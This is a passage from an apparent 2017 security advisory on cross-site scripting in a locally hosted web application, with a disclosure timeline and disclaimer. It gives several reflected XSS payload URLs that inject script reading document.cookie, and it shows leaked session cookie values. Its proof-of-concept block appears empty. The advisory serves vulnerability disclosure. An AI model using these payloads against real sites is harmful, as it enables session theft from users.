+if an authenticated user clicks a malicious link or visits an attacker controlled webpage. + + + +Exploit/POC: +============= +
+ + + +
+ +Then visit http://localhost:4040/index.view + +HTTP Response: +XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl + + +Misc Reflected: + +XSS 1 +http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +XSS 2 +http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E + +XSS 3 +http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E + + + +Network Access: +=============== +Remote + + + + +Severity: +========= +High + + + +Disclosure Timeline: +================================== +Vendor Notification: May 29, 2017 +Vendor Acknowledgement: May 30, 2017 +June 4, 2017 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file